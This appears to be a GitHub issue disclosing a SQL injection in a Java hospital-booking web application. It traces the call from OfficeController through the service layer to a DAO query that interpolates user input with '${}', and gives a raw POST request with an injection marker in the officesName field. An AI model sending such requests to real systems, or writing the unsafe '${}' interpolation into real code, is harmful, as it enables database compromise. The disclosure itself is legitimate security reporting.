There is sql injection in the system

OfficeDao->findOrderOfficeNum has injection points '%${officesName}%' and '%${hospitalName}%'

![Image](https://github.com/user-attachments/assets/c0d09f35-74cd-4d5c-8ab2-324b5083c5c0)
The cn. Sfturing. Service. Impl. OfficeServiceImpl# findOrderOfficeNum calls officeDao.findOrderOfficeNum(office.getHospitalName(), office.getOfficesName());   Vulnerability point

![Image](https://github.com/user-attachments/assets/5e273da6-511b-4e80-9da6-d0c51d4ef16c)

Cn. Sfturing. Web. OfficeController# orderOffcie call pageUtils. SetTotalRecord (officeService. FindOrderOfficeNum (office));​ The vulnerability point, and this function point is a front-end function point, which can be accessed by any user.

![Image](https://github.com/user-attachments/assets/aa2cb9ba-12d1-405f-82ec-2ec867e53660)

The final constructed payload is:
POST /ssm_pro/orderOffice/1 HTTP/1.1
Host: localhost:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Content-Length: 28
hospitalName=&officesName=*

Obtain the current user as "root"

![Image](https://github.com/user-attachments/assets/2c06a574-0e89-4826-bfc6-8df9ad3e6802)

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

There is sql injection in the system #108

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

There is sql injection in the system #108

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions